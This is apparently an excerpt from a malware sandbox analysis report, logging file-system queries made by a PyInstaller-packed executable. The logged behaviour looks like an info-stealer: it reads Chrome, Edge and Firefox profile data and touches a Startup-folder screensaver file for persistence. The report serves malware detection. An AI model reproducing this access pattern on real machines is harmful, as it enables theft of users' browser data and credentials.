                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_ctypes.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\blank.aes VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\libcrypto-1_1.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\libffi-7.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\rarreg.key VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\VCRUNTIME140.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_decimal.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_socket.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_ssl.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\blank.aes VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_lzma.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_bz2.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_sqlite3.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_socket.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\select.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_ssl.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_hashlib.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\_queue.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\unicodedata.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformationJump to behavior
